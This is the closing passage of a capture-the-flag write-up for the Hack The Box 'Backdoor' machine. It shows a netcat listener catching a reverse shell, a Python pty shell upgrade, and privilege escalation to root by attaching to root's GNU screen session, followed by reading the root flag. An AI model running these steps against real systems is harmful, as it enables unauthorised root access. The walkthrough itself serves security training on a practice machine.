  5. Also specifying the ID after the "/" should be able to retrieve that session, but not for the non-owner user.
  6. It's possible if you are the user who created the session
  7. Or by using superuser privileges
  8. You can create as many sessions as you want
  9. Each user will be able to list their sessions by default
  10. Even for the root user, it still seems impossible to reconnect to sessions other than their own.

Seeing this, it is almost impossible for me to identify an exploit via this SUID, since on my machine it is not possible to connect through another user's session. In spite of everything, I try the commands on the remote machine, hoping that I have misconfigured some other setting.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444                                                                                               1 ⨯
listening on [any] 4444 ...
connect to [10.10.14.172] from backdoor.htb [10.10.11.125] 51082
python3 -c 'import pty; pty.spawn("/bin/sh")'
$ screen -x root/
screen -x root/
Please set a terminal type.
$ export TERM=xterm
export TERM=xterm
$ screen -x root/
screen -x root/

We run the command for a preliminary configuration and when I try to list the active sessions for the root user, it connects automatically, as if only one session was active. This is really weird and unexpected, but pleasantly welcome, so much so that I get the root flag.

root@Backdoor:~# whoami                                                                              
whoami
root
root@Backdoor:~# cat /root/root.txt
cat /root/root.txt
a******************************7
root@Backdoor:~#

Thats all folks, thank you for listening!

The awesome artwork used in this article was created by Mr Misang, in this picture our mysterious protagonist becomes some sort of colorful worm.